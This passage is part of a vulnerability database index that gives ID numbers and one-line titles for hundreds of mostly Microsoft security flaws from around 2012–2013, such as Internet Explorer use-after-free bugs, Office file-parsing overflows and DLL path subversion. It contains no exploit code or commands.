Corruption (2013-3193) [96187] Microsoft IE Unspecified Memory Corruption (2013-3191) [96186] Microsoft IE Unspecified Memory Corruption (2013-3190) [96185] Microsoft IE Unspecified Memory Corruption (2013-3189) [96184] Microsoft IE Unspecified Memory Corruption (2013-3188) [96183] Microsoft IE Unspecified Memory Corruption (2013-3187) [96182] Microsoft IE Unspecified Memory Corruption (2013-3184) [96181] Microsoft Active Directory Federation Services (AD FS) Open Endpoint Unspecified Account Information Disclosure [96127] National Instruments LabWindows/CVI Help Subsystem ActiveX Unspecified Issue [95886] OpenAFS for Windows afslogon.dll krb5_context Creation Failure Memory Exhaustion Remote DoS [95826] Microsoft IE jscript9.dll Recycler::ProcessMark Function Garbage Collection Object Address Information Disclosure Weakness [95687] Microsoft IE Enhanced / Protected Mode Elevation Policy Check Bypass [95617] Microsoft IE 9 Status Bar Spoofing Weakness [95569] Microsoft DirectShow Runtime quartz.dll CWAVEStream::GetMaxSampleSize() Function Multiple Sound File Handling Divide-by-Zero DoS Weakness [95377] Novell GroupWise on Windows Email Message Body Arbitrary Code Execution Weakness [95029] Google Chrome for Windows GL Texture Screen Information Disclosure [94984] Microsoft IE Shift JIS Character Encoding XSS [94983] Microsoft IE Unspecified Memory Corruption (2013-3115) [94982] Microsoft IE Unspecified Memory Corruption (2013-3164) [94981] Microsoft IE Unspecified Memory Corruption Arbitrary Code Execution (2013-3163) [94980] Microsoft IE Unspecified Memory Corruption (2013-3162) [94979] Microsoft IE Unspecified Memory Corruption (2013-3161) [94978] Microsoft IE Unspecified Memory Corruption (2013-3153) [94977] Microsoft IE Unspecified Memory Corruption (2013-3152) [94976] Microsoft IE Unspecified Memory Corruption (2013-3151) [94975] Microsoft IE Unspecified Memory Corruption (2013-3150) [94974] Microsoft IE Unspecified Memory Corruption (2013-3146) [94973] Microsoft IE Unspecified Memory Corruption (2013-3149) [94972] Microsoft IE Unspecified Memory Corruption (2013-3148) [94971] Microsoft IE Unspecified Memory Corruption (2013-3147) [94969] Microsoft IE Unspecified Memory Corruption (2013-3145) [94968] Microsoft IE Unspecified Memory Corruption (2013-3144) [94967] Microsoft IE Unspecified Memory Corruption (2013-3143) [94960] Microsoft Multiple Product TrueType Font (TTF) File Handling Arbitrary Code Execution [94959] Microsoft .NET Framework / Silverlight Multidimensional Arrays Small Structure Handling Arbitrary Code Execution [94958] Microsoft Silverlight NULL Pointer Handling Arbitrary Code Execution [94957] Microsoft .NET Framework Delegate Object Serialization Permission Validation Privilege Escalation [94956] Microsoft .NET Framework Small Structure Array Allocation Remote Code Execution [94955] Microsoft .NET Framework Anonymous Method Injection Reflection Objection Permission Validation Privilege Escalation [94954] Microsoft .NET Framework Delegate Reflection Bypass Reflection Objection Permission Validation Privilege Escalation [94507] Microsoft IE Infinite Loop DoS [94330] Microsoft Outlook S/MIME EmailAddress Attribute Mismatch Weakness [94154] IBM Informix Dynamic Server on Windows Crafted SQLIDEBUG Handling Remote DoS [94127] Microsoft Office PNG File Handling Buffer Overflow [94123] Microsoft IE Webpage Script Debugging Memory Corruption [94122] Microsoft IE Unspecified Memory Corruption (2013-3142) [94121] Microsoft IE Unspecified Memory Corruption (2013-3141) [94120] Microsoft IE Unspecified Memory Corruption (2013-3139) [94119] Microsoft IE Unspecified Memory Corruption (2013-3125) [94118] Microsoft IE Unspecified Memory Corruption (2013-3124) [94117] Microsoft IE Unspecified Memory Corruption (2013-3123) [94116] Microsoft IE Unspecified Memory Corruption (2013-3122) [94115] Microsoft IE Unspecified Memory Corruption (2013-3121) [94114] Microsoft IE Unspecified Memory Corruption (2013-3120) [94113] Microsoft IE Unspecified Memory Corruption (2013-3119) [94112] Microsoft IE Unspecified Memory Corruption (2013-3118) [94111] Microsoft IE Unspecified Memory Corruption (2013-3117) [94110] Microsoft IE Unspecified Memory Corruption (2013-3116) [94109] Microsoft IE Unspecified Memory Corruption (2013-3114) [94108] Microsoft IE Unspecified Memory Corruption (2013-3113) [94107] Microsoft IE Unspecified Memory Corruption (2013-3112) [94106] Microsoft IE Unspecified Memory Corruption (2013-3111) [94105] Microsoft IE Unspecified Memory Corruption (2013-3110) [94094] Splunk for Windows Universal Forwarder Path Subversion Local Privilege Escalation [93840] Google Chrome for Windows GetFileHandleForProcess Function ipc_platform_file.cc Handle Value Validation Issue [93723] Novell Client for Windows nwfs.sys 0x1439EB IOCTL Handling Local Integer Overflow [93718] Novell Client for Windows nicm.sys 0x143B6B IOTCL Request Handling Local Privilege Escalation [93425] Mozilla Multiple Product Mozilla Maintenance Service for Windows Local Privilege Escalation [93396] Microsoft Malware Protection Engine Crafted File Scan Handling Memory Corruption [93316] Microsoft Visio File Handling External Entity (XXE) Data Parsing Arbitrary File Access [93315] Microsoft Office Word DOC File Shape Data Handling Arbitrary Code Execution [93314] Microsoft Office Publisher PUB File Handling Buffer Underflow [93313] Microsoft Office Publisher PUB File Pointer Handling Arbitrary Code Execution [93312] Microsoft Office Publisher PUB File Signed Integer Handling Arbitrary Code Execution [93311] Microsoft Office Publisher PUB File Incorrect NULL Value Handling Arbitrary Code Execution [93310] Microsoft Office Publisher PUB File Invalid Range Check Handling Arbitrary Code Execution [93309] Microsoft Office Publisher PUB File Return Value Validation Arbitrary Code Execution [93308] Microsoft Office Publisher PUB File Handling Buffer Overflow [93307] Microsoft Office Publisher PUB File Return Value Handling Arbitrary Code Execution [93306] Microsoft Office Publisher PUB File Corrupt Interface Pointer Handling Arbitrary Code Execution [93305] Microsoft Office Publisher PUB File Handling Integer Overflow [93304] Microsoft Office Publisher PUB File Negative Value Allocation Handling Arbitrary Code Execution [93303] Microsoft Lync Unspecified Use-after-free Arbitrary Code Execution [93302] Microsoft .NET Framework WCF Endpoint Authentication Unspecified Policy Requirement Weakness Authentication Bypass [93301] Microsoft .NET Framework XML File Signature Validation Spoofing Weakness [93298] Microsoft IE CMarkup Object Handling Use-after-free Arbitrary Code Execution [93297] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1312) [93296] Microsoft IE textNode Style Computation Use-after-free Arbitrary Code Execution [93295] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1310) [93294] Microsoft IE CDispNode Use-after-free Arbitrary Code Execution [93293] Microsoft IE TransNavContext Object Handling Use-after-free Arbitrary Code Execution [93292] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1307) [93291] Microsoft IE Anchor Element Handling Use-after-free Arbitrary Code Execution [93290] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-0811) [93289] Microsoft IE Unspecified JSON Data File Information Disclosure [93081] Microsoft Security Essentials UninstallString Unquoted Search Path Local Privilege Escalation Weakness [93075] Forbes Magazine Microsoft Office 365 T-Mobile Router Admin Interface Default Password [93005] Microsoft IE MSXML XMLDOM Object Local File Enumeration [92993] Microsoft IE CGenericElement Object Handling Use-after-free Arbitrary Code Execution [92985] DotNetNuke Modal Windows XSS [92931] Microsoft System Center Operations Manager Web Console /InternalPages/ViewTypeManager.aspx Multiple Parameter XSS [92913] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1338) [92771] HP OpenView Operations / VantagePoint for Windows Remote Managed Node Unauthorized Command Execution [92487] Sleipnir on Windows SSL Indicators Unspecified Spoofing Weakness [92284] Microsoft IE localStorage Method History Manipulation Disk Consumption DoS [92257] Microsoft IE CSS Import Handling Remote DoS [92129] Microsoft Office HTML Sanitization Component Unspecified XSS [92128] Microsoft Antimalware Client Improper Pathname Handling Local Privilege Escalation Weakness [92123] Microsoft SharePoint Server SharePoint Lists Access Control Handling Unspecified Information Disclosure [92121] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1304) [92120] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1303) [92015] Windows SNMP Default Community Write Permission Remote Device Manipulation [91822] Juniper IVE OS Secure Access (SA) Windows Secure Application Manager Uninstall Link XSS [91199] FFmpeg libavcodec msrledec.c msrle_decode_8_16_24_32 Function Microsoft RLE Data Processing DoS [91198] Microsoft IE Broker Process Variant Object Handling Sandbox Bypass Arbitrary Code Execution [91197] Microsoft IE vml.dll Vector Graphic Property Handling Integer Overflow [91196] Microsoft IE Broker Pop-up Window Handling Protected Mode Bypass (pwn2own) [91179] Schneider Electric CD Kerwin on Windows Unauthenticated Synoptic Access [91177] Schneider Electric CD Kerwin on Windows Synoptics Information Disclosure [91154] Microsoft Office for Mac HTML5 Email Message Unspecified Content Tag Loading Information Disclosure [91153] Microsoft OneNote Buffer Size Validation ONE File Handling Information Disclosure [91152] Microsoft SharePoint Unspecified Remote Buffer Overflow DoS [91151] Microsoft SharePoint Unspecified Traversal Privilege Escalation [91150] Microsoft SharePoint Unspecified XSS [91149] Microsoft SharePoint Callback Function Unspecified URL Handling Privilege Escalation [91148] Microsoft Visio Viewer Unspecified Tree Object Type Confusion Visio File Handling Arbitrary Code Execution [91147] Microsoft Silverlight Application Handling Unspecified Double Dereference Arbitrary Code Execution [91146] Microsoft IE CTreeNode Unspecified Use-after-free Arbitrary Code Execution [91145] Microsoft IE removeChild CHtmlComponentProperty Object Handling Use-after-free Arbitrary Code Execution [91144] Microsoft IE onBeforeCopy execCommand selectAll Event Handling Use-after-free Arbitrary Code Execution [91143] Microsoft IE GetMarkupPtr execCommand Print Event Handling Use-after-free Arbitrary Code Execution [91142] Microsoft IE CElement Unspecified Use-after-free Arbitrary Code Execution [91141] Microsoft IE CCaret Unspecified Use-after-free Arbitrary Code Execution [91140] Microsoft IE CMarkupBehaviorContext Object Handling Use-after-free Arbitrary Code Execution [91139] Microsoft IE saveHistory Onload Event Handler Event Handling Use-after-free Arbitrary Code Execution [91138] Microsoft IE OnResize / OnMove CElement::EnsureRecalcNotify() Function Use-after-free Arbitrary Code Execution [91066] IBM WebSphere Application Server (WAS) on Windows was.policy File Permission Handling Weakness [90933] Microsoft IE Arbitrary HTM File Execution [90932] Citrix Metaframe for Windows Malformed Java Applet Handling Remote DoS [90743] RSA Authentication Agent for Windows Quick PIN Unlock Passcode Bypass [90127] Microsoft IE Vector Markup Language (VML) Buffer Allocation Memory Corruption [90126] Microsoft IE CHTML CSelectionManager Object Handling Use-after-free Arbitrary Code Execution [90125] Microsoft IE CObjectElement Object Handling Use-after-free Arbitrary Code Execution [90124] Microsoft IE CPasteCommand Use-after-free Arbitrary Code Execution [90123] Microsoft IE InsertElement Use-after-free Arbitrary Code Execution [90122] Microsoft IE SLayoutRun Use-after-free Arbitrary Code Execution [90121] Microsoft IE pasteHTML TextRange Object Handling Use-after-free Arbitrary Code Execution [90120] Microsoft IE CDispNode SVG Object Handling Use-after-free Arbitrary Code Execution [90119] Microsoft IE LsGetTrailInfo Use-after-free Arbitrary Code Execution [90118] Microsoft IE vtable Use-after-free Arbitrary Code Execution [90117] Microsoft IE CMarkup / CData Object Handling Use-after-free Arbitrary Code Execution [90116] Microsoft IE COmWindowProxy Use-after-free Arbitrary Code Execution [90115] Microsoft IE SetCapture Method Handling Use-after-free Arbitrary Code Execution [90114] Microsoft IE Shift JIS Character Encoding Information Disclosure [89619] Microsoft IE Proxy Server TCP Session Re-use Cross-user Information Disclosure Weakness [89618] Microsoft IE HTTP / Secure Request Handling Spoofing Weakness [89593] Embedthis Appweb on Windows src/mpr/mprLib.c mprUrlEncode Function Heap-based Overflow [89553] Microsoft IE SRC Attribute UNC Share Pathname Handling Arbitrary File Information Disclosure [89478] Cisco VPN Client for Windows VPN Driver Malformed Application Handling Local DoS [89303] Scribus on Windows Python Scripter Unspecified Issue [89164] Microsoft Lync User-Agent Header Handling Remote Arbitrary Command Execution [89086] Google Chrome for Windows IPC NUL Termination Weakness [89080] Google Chrome for Windows Shared Memory Allocation Handling Integer Overflow [89037] Sybase Adaptive Server Enterprise for Windows Unspecified DoS [89035] Sybase Adaptive Server Enterprise for Windows Unspecified Installation Log File Information Disclosure [88968] Microsoft .NET Framework Replace() Function Open Data Protocol (OData) HTTP Request Parsing Remote DoS [88965] Microsoft .NET Framework Double Construction Privilege Escalation [88964] Microsoft .NET Framework System.DirectoryServices.Protocols.SortRequestControl.GetValue() Method this.keys.Length Parameter Heap Buffer Overflow [88962] Microsoft .NET Framework System Drawing Memory Pointer Handling CAS Bypass Information Disclosure [88961] Microsoft System Center Operations Manager Web Console /InternalPages/ExecuteTask.aspx __CALLBACKPARAM Parameter XSS [88960] Microsoft System Center Operations Manager Web Console Unspecified XSS (2013-0009) [88959] Microsoft XML Core Services Integer Truncation XML Handling Memory Corruption [88958] Microsoft XML Core Services Unspecified XSLT Handling Memory Corruption [88914] Eye-Fi Helper for Windows Image .tar Handling Traversal Arbitrary File Write Remote Privilege Escalation [88837] Microsoft Office Excel Memory Corruption DoS [88811] Microsoft Visio VSD File Parsing Memory Corruption [88774] Microsoft IE CDwnBindInfo Object Handling Use-after-free Arbitrary Code Execution [88650] Novell NetIQ eDirectory on Windows dhost Malformed HTTP Request Handling Remote DoS [88642] Trend Micro InterScan VirusWall for Windows interscan.dll Unauthenticated Configuration Manipulation [88638] Jetty on Windows Mixed Case WEB-INF Request Security Bypass [88548] gnome-screensaver gs-manager.c show_windows() Function System Resume Screen Content Disclosure [88539] Microsoft IE mshtml.dll Unclosed Tags Sequence Handling Overflow Arbitrary Code Execution [88357] Microsoft IE fireEvent() Method Mouse / Keyboard Activity Disclosure [88319] Microsoft IE InjectHTMLStream Object Handling Use-after-free Arbitrary Code Execution [88318] Microsoft IE CMarkup Object Handling Use-after-free Arbitrary Code Execution [88317] Microsoft IE Object Ref Counting Use-after-free Arbitrary Code Execution [88315] Microsoft Office Word RTF listoverridecount Element Handling Remote Code Execution [88314] Microsoft Exchange Server RSS Feed Handling Unspecified Remote DoS [88311] Microsoft IP-HTTPS Component Revoked Certificate Restriction Bypass [88170] Microsoft IE Malformed Location Header 30x Redirect Handling DoS [87881] WibuKey Runtime for Windows WkWin32.dll Module DisplayMessageDialog() Method String Parsing Overflow [87819] Microsoft Office OneNote File Handling Memory Corruption [87666] Diebold AccuVote-TSX / GEMS SSL Certificate Windows Registry Plaintext Local Password Disclosure [87555] Adobe ColdFusion for Microsoft IIS Unspecified DoS [87506] Tor Relay Descriptor Windows Capabilities Remote Disclosure [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS [87273] Microsoft Office Excel XLS File Handling Overflow [87272] Microsoft Office Excel XLS File Invalid Length SST Handling Use-after-free Arbitrary Code Execution [87271] Microsoft Office Excel XLS File Handling Memory Corruption [87270] Microsoft Office Excel SerAuxErrBar XLS File Handling Overflow [87267] Microsoft .NET Framework WPF Reflection Optimization Object Permission Handling Arbitrary Code Execution [87266] Microsoft .NET Framework Web Proxy Setting Auto-Discovery (WPAD) Handling Remote Code Execution [87265] Microsoft .NET Framework Path Subversion Arbitrary DLL Injection Code Execution [87264] Microsoft .NET Framework Partially Trusted Code Function Handling Information Disclosure [87263] Microsoft .NET Framework Reflection Object Permission Handling Arbitrary Code Execution [87262] Microsoft IIS FTP Command Injection Information Disclosure [87261] Microsoft IIS Log File Permission Weakness Local Password Disclosure [87258] Microsoft IE CTreePos Deleted Object Handling Use-after-free Arbitrary Code Execution [87257] Microsoft IE CFormElement Deleted Object Handling Use-after-free Arbitrary Code Execution [87256] Microsoft IE CTreeNode Deleted Object Handling Use-after-free Arbitrary Code Execution [87255] Microsoft Office Excel XLS File Handling Memory Corruption [87058] Sophos Anti-Virus for Windows Buffer Overflow Protection System (BOPS) sophos_detoured_x64.dll ASLR Bypass [86929] Microsoft MN-700 Hardcoded SSL Private Key SSL Traffic Decryption Weakness [86924] X Windows (X11R6) Malformed Font Size Handling DoS [86913] Microsoft IE Recursive JavaScript Event Handling DoS [86906] Microsoft Multiple Products VBScript ActiveX Word Object Handling DoS [86899] Microsoft IIS 302 Redirect Message Internal IP Address Remote Disclosure [86898] Microsoft IE Crafted IMG Tag Saturation Remote DoS [86897] Oracle on Windows TNSLSNR80.EXE Malformed Input Parsing Remote DoS [86896] Microsoft IE MSScriptControl.ScriptControl GetObject Arbitrary File Access [86790] Microsoft Virtual PC 2007 Crafted x86 Instruction Sequence Handling Local DoS [86776] Microsoft IE 9 File NULL Byte Handling XSS Filter Bypass [86767] Microsoft Office Publisher Read Access Violation PUB File Handling Memory Corruption [86733] Microsoft Office Picture Manager GIF Image File Handling Memory Corruption [86732] Microsoft Office DOC File Handling Stack Overflow [86623] Microsoft Office Excel / Excel Viewer (Xlview.exe) XLS File Handling Arbitrary Code Execution [86622] Microsoft SQL Server Local Authentication Bypass [86515] Mozilla Firefox nsFilePicker Windows Recent Documents Privacy Mode Bypass [86512] Mozilla Firefox on Windows 7 Jump Bar Limited Browsing History Disclosure [86179] ActiveTcl on Windows Path Subversion Arbitrary DLL Injection Code Execution [86178] Python on Windows Path Subversion Arbitrary DLL Injection Code Execution [86177] ActivePerl on Windows Path Subversion Arbitrary DLL Injection Code Execution [86176] ActivePython on Windows Path Subversion Arbitrary DLL Injection Code Execution [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution [86174] Zend Server on Windows Path Subversion Arbitrary DLL Injection Code Execution [86173] RubyInstaller on Windows Path Subversion Arbitrary DLL Injection Code Execution [86172] PHP on Windows Path Subversion Arbitrary DLL Injection Code Execution [86158] EMC NetWorker Module for Microsoft Applications (NMM) Communication Channel Crafted Message Parsing Remote Code Execution [86157] EMC NetWorker Module for Microsoft Applications (NMM) MS Exchange Server Upgrade / Installation Cleartext Admin Credential Local Information Disclosure [86059] Microsoft Multiple Product HTML String Sanitization XSS Weakness [86057] Microsoft SQL Server Report Manager Unspecified XSS [86056] Microsoft Works Unspecified DOC File Handling Memory Corruption [86055] Microsoft Multiple Product RTF File listid Handling Use-after-free Remote Code Execution [86054] Microsoft Office Word File PAPX Section Handling Memory Corruption [85835] Oracle on Windows bb.sqljsp Traversal Arbitrary File Access [85834] Oracle on Windows a.jsp Traversal Arbitrary File Access [85833] Microsoft Outlook Concealed Attachment Weakness [85832] Microsoft Virtual Machine Custom Java Codebase Arbitrary Command Execution [85830] Microsoft IE index.dat OBJECT DATA Tag File Injection Arbitrary Command Execution [85826] Microsoft IE mstask.exe Malformed Packet Handling CPU Consumption Remote DoS [85727] RSA Authentication Agent / Client Windows Credentials Usage Local Authentication Bypass [85574] Microsoft IE cloneNode Element Use-after-free Memory Corruption [85573] Microsoft IE CTreeNode Object ISpanQualifier Instance Type Confusion Use-after-free Memory Corruption [85572] Microsoft IE Event Listener Unspecified Use-after-free Memory Corruption [85571] Microsoft IE OnMove Unspecified Use-after-free Memory Corruption [85532] Microsoft IE CMshtmlEd::Exec() Function Use-after-free Remote Code Execution [85316] Microsoft System Center Configuration Manager ReportChart.asp URI XSS [85315] Microsoft Visual Studio Team Foundation Server Unspecified XSS [84912] Microsoft MS-CHAP V2 Virtual Private Network (VPN) MitM Password Disclosure [84896] Skype on Windows Malformed File Transfer Remote Memory Corruption DoS [84606] Microsoft Visio DXF File Handling Overflow [84605] Microsoft Office Computer Graphics Metafile (CGM) File Handling Memory Corruption [84597] Microsoft IE JavaScript Parsing Memory Object Size Calculation Memory Corruption [84596] Microsoft IE NULL Object Handling Use-after-free Arbitrary Code Execution [84595] Microsoft IE Layout Handling Deleted Object Handling Memory Corruption [84594] Microsoft IE Deleted Virtual Function Table Handling Arbitrary Code Execution [84553] Microsoft Help &amp [84433] Citrix Access Gateway Plugin for Windows ActiveX (nsepa.exe) StartEPA() Method Multiple HTTP Response Header Parsing Remote Overflow [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [84224] Sybase Adaptive Server Enterprise for Windows Java Unspecified Arbitrary File Access [83860] Microsoft IE XML Data Handling Arbitrary File Access [83797] Microsoft IE on NT Hashed Password Remote Disclosure MiTM Weakness [83771] Microsoft IIS Tilde Character Request Parsing File / Folder Name Information Disclosure [83720] Microsoft .NET Framework Crafted Tilde (~) Request Resource Consumption Remote DoS [83672] Microsoft IE NTLM Authentication Remote Information Disclosure [83655] Microsoft Visual Basic for Applications Unspecified Path Subversion Arbitrary DLL Injection Code Execution [83654] Microsoft Office for Mac Insecure Permissions Arbitrary File Creation Local Privilege Escalation [83653] Microsoft IE Deleted Cached Object Handling Memory Corruption [83652] Microsoft IE Attribute Removal Handling Memory Corruption [83651] Microsoft SharePoint Reflected List Parameter Unspecified XSS [83650] Microsoft SharePoint scriptresx.ashx Unspecified XSS [83649] Microsoft SharePoint Arbitrary User Search Scope Manipulation [83648] Microsoft SharePoint Unspecified Arbitrary Site Redirect [83647] Microsoft SharePoint Username Unspecified XSS [83567] Microsoft NT Advanced Server (NTAS) FTP Client Pipe Character Arbitrary Command Execution [83545] Microsoft Outlook Web App owa/redir.aspx URL Parameter Arbitrary Site Redirect [83454] Microsoft IIS ODBC Tool ctguestb.idc Unauthenticated Remote DSN Initialization [83439] Microsoft IE Long Unicode String Handling DoS [83388] Microsoft JET Database Engine (MS Access) ODBC API Crafted VBA String Remote Command Execution [83386] Microsoft IIS Non-existent IDC File Request Web Root Path Disclosure [83251] Google Chrome for Windows metro_driver.dll Path Subversion Arbitrary DLL Injection Code Execution Weakness [82873] Microsoft XML Core Services Uninitalized Memory Object Handling Remote Code Execution [82872] Microsoft IE Scrolling Events Cross-domain Remote Information Disclosure [82871] Microsoft IE OnRowsInserted Deleted Object Handling Memory Corruption [82870] Microsoft IE insertRow Deleted Object Handling Memory Corruption [82869] Microsoft IE insertAdjacentText Memory Location Accessing Memory Corruption [82868] Microsoft IE OnBeforeDeactivate Event Deleted Object Handling Memory Corruption [82867] Microsoft IE Title Element Change Deleted Object Handling Memory Corruption [82866] Microsoft IE Col Element Deleted Object Handling Memory Corruption [82865] Microsoft IE Same ID Property Deleted Object Handling Memory Corruption [82864] Microsoft IE Developer Toolbar Deleted Object Handling Memory Corruption [82863] Microsoft IE Null Byte Process Memory Remote Information Disclosure [82862] Microsoft IE EUC-JP Character Encoding XSS [82861] Microsoft IE HTML Sanitization String Handling Remote Information Disclosure [82860] Microsoft IE Center Element Deleted Object Handling Memory Corruption [82859] Microsoft .NET Framework Memory Access Function Pointer Handling Memory Corruption [82853] Microsoft Dynamics AX Enterprise Portal Unspecified XSS [82852] Microsoft Lync Unspecified Path Subversion Arbitrary DLL Injection Code Execution [82848] Microsoft IIS $INDEX_ALLOCATION Data Stream Request Authentication Bypass [82673] Mozilla Multiple Product Windows Shares HTML Page Loading Arbitrary File Access [82565] Microsoft IE / Outlook OBJECT Handling Arbitrary File Access [82564] Microsoft Word WebView Crafted Metadata Handling Arbitrary Script Execution [82563] Microsoft Visual Studio WebViewFolderIcon ActiveX (MSCOMM32.OCX) Overflow [82562] Microsoft IE Cross-Origin Window Forced Navigation Weakness [82473] Microsoft WordPad DOC File Handling NULL Pointer Dereference DoS [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion [82405] Microsoft ASP.NET Session ID Generation Entropy Weakness [81960] Google Chrome for Windows NPAPI Plugins Search Path Subversion Local Privilege Escalation [81903] Microsoft Office X for Macintosh Registration Service Remote Overflow DoS [81734] Microsoft .NET Framework Untrusted User Input Serialization Remote Code Execution [81733] Microsoft .NET Framework Partially Trusted Assembly Object Serialization Remote Code Execution [81732] Microsoft Office RTF Data Handling Memory Corruption [81731] Microsoft Visio Viewer Attribute Validation Visio File Handling Memory Corruption [81728] Microsoft Office Excel Excel File Handling Memory Corruption [81727] Microsoft Office Excel OBJECTLINK Record Excel File Handling Memory Corruption [81726] Microsoft Office Excel Modified Bytes Excel File Handling Memory Corruption [81725] Microsoft Office Excel SLXI Record Excel File Handling Memory Corruption [81724] Microsoft Office Excel Type Mismatch Series Record Excel File Handling Memory Corruption [81723] Microsoft Office Excel MergeCells Record Excel File Handling Overflow [81722] Microsoft .NET Framework Buffer Allocation XBAP / .NET Application Handling Remote Code Execution [81721] Microsoft .NET Framework WPF Application Index Value Comparison Request Parsing Remote DoS [81719] Microsoft Office GDI+ Library Embedded EMF Image Office Document Handling Overflow [81718] Microsoft Silverlight Hebrew Unicode Engine XAML Glyph Rendering Double-free Remote Code Execution [81624] IBM AppScan / Policy Tester Integrated Windows Authentication Service Account Hijacking [81331] Microsoft Visual Studio Incremental Linker (link.exe) ConvertRgImgSymToRgImgSymEx Function COFF Symbol Table Executable Handling Remote Overflow [81134] Microsoft Multiple Product Works Converter WPS File Handling Remote Overflow [81133] Microsoft .NET Framework CRL (Common Language Runtime) Function Parameter Parsing Remote Code Execution [81132] Microsoft Forefront Unified Access Gateway Default Website Configuration External Network Information Disclosure [81131] Microsoft Forefront Unified Access Gateway UAG Server Arbitrary Site Redirect [81130] Microsoft IE vgx.dll VML Style Deleted Object Handling Remote Memory Corruption [81129] Microsoft IE SelectAll Deleted Object Handling Remote Memory Corruption [81128] Microsoft IE onReadyStateChange Event Deleted Object Handling Remote Memory Corruption [81127] Microsoft IE JScript9 Deleted Object Handling Remote Memory Corruption [81126] Microsoft IE Print Feature HTML Page Printing Remote Code Execution [81125] Microsoft Multiple Product MSCOMCTL.OCX Multiple Control Memory Corruption [81112] Microsoft SQL Server RESTORE DATABASE Command SQL Injection [80487] Microsoft Security Essentials Antimalware Engine Malformed CAB File Handling Scan Bypass [80443] Microsoft Security Essentials Antimalware Engine Malformed RAR File Handling Scan Bypass [80402] Microsoft Security Essentials Antimalware Engine Malformed TAR File Handling Scan Bypass [80376] Sophos Anti-Virus Malformed Microsoft Office File Handling Scan Bypass [80375] Comodo Antivirus Malformed Microsoft Office File Handling Scan Bypass [80352] Bitcoin-Qt for Windows Malformed Bitcoin Protocol Message Handling Remote Code Execution [80174] Microsoft IE Protected Mode Bypass Low Integrity Process Handling Memory Corruption DoS [80173] Microsoft IE Unspecified Overflow [80088] Apple Safari Internationalized for Windows Domain Name (IDN) Feature Homoglyph Parsing Domain Name Spoofing Weakness [80006] Microsoft Visual Studio Add-In Loading Local Privilege Escalation [80001] Microsoft Expression Design Path Subversion Arbitrary DLL Injection Code Execution [79629] Diebold AccuVote-TS Memory Card explorer.glb BallotStation Boot Sequence Bypass Windows Access [79551] Sun Java on Windows fontmanager.dll UIManager.getSystemLookAndFeelClassName Function Overflow [79268] Microsoft IE Deleted Object VML Handling Remote Memory Corruption [79267] Microsoft IE String Creation NULL Byte Handling Process Memory Information Disclosure [79266] Microsoft IE Deleted Object HTML Layout Handling Remote Memory Corruption [79265] Microsoft IE Copy and Paste Cross-domain Information Disclosure [79264] Microsoft SharePoint wizardlist.aspx skey Parameter XSS [79263] Microsoft SharePoint themeweb.aspx Unspecified XSS [79262] Microsoft SharePoint inplview.aspx Unspecified XSS [79261] Microsoft .NET Framework / Silverlight Buffer Length Calculation XAML Browser Application Handling Remote Memory Corruption [79260] Microsoft .NET Framework / Silverlight Unmanaged Object XAML Browser Application Handling Remote Code Execution [79258] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0038) [79257] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0037) [79256] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0036) [79255] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0020) [79254] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0019) [79192] Microsoft IE Javascript Dialog Origin Spoofing [79186] Microsoft IE onunload Location Field Overwrite [79173] Microsoft IE Image Control Title Attribute Status Bar Spoofing [79164] Microsoft IE about:blank Location Bar Overlay Phishing Weakness [79120] Microsoft Live Writer Path Subversion Arbitrary DLL Injection Code Execution [79118] Microsoft RDP Client Path Subversion Arbitrary DLL Injection Code Execution [79116] Microsoft Snapshot Viewer Path Subversion Arbitrary DLL Injection Code Execution [79115] Microsoft MS Clip Book Viewer Path Subversion Arbitrary DLL Injection Code Execution [79114] Microsoft Clip Organizer Path Subversion Arbitrary DLL Injection Code Execution [79113] Microsoft Movie Maker Path Subversion Arbitrary DLL Injection Code Execution [79112] Microsoft Virtual PC Path Subversion Arbitrary DLL Injection Code Execution [79088] Windows Live Messenger (Hotmail) for iPhone Username Local Disclosure [79041] Webmin Samba Windows File Sharing Module /tmp/.webmin Local Password Disclosure [78738] Mozilla Multiple Products mImageBufferSize() Method image/vnd.microsoft.icon Image Encoding Information Disclosure [78442] Oracle VM VirtualBox Windows Guest Additions Component Unspecified Local Issue [78208] Microsoft AntiXSS Library Sanitization Module Escaped CSS Content Parsing XSS Weakness [78057] Microsoft .NET Framework ASP.NET Hash Collision Web Form Post Parsing Remote DoS [78056] Microsoft .NET Framework Forms Authentication Sliding Expiry Cached Content Parsing Remote Code Execution [78055] Microsoft .NET Framework ASP.NET Username Parsing Authentication Bypass [78054] Microsoft .NET Framework Forms Authentication Return URL Handling Arbitrary Site Redirect [77675] Microsoft IE Content-Disposition Header Parsing Cross-Domain Remote Information Disclosure [77674] Microsoft IE Path Subversion Arbitrary DLL Injection Code Execution [77673] Microsoft IE XSS Filter Event Parsing Cross-Domain Remote Information Disclosure [77672] Microsoft Office Publisher Unspecified Publisher File Handling Remote Memory Corruption [77671] Microsoft Office Publisher Invalid Pointer Publisher File Handling Remote Memory Corruption [77670] Microsoft Office Publisher Array Indexing Publisher File Handling Remote Memory Corruption [77669] Microsoft Office Pinyin IME for Simplified Chinese Insecure Configuration Option Local Privilege Escalation [77668] Microsoft Office PowerPoint Path Subversion Arbitrary DLL Injection Code Execution [77665] Microsoft Time ActiveX (DATIME.DLL) Unspecified IE Web Page Handling Remote Code Execution [77664] Microsoft Office PowerPoint OfficeArt Shape Record PowerPoint File Handling Remote Memory Corruption [77661] Microsoft Office Excel Record Parsing Object Handling Remote Memory Corruption [77659] Microsoft Office Use-after-free Border Property Word Document Handling Remote Code Execution [77606] Microsoft IE JavaScript Implementation getComputedStyle 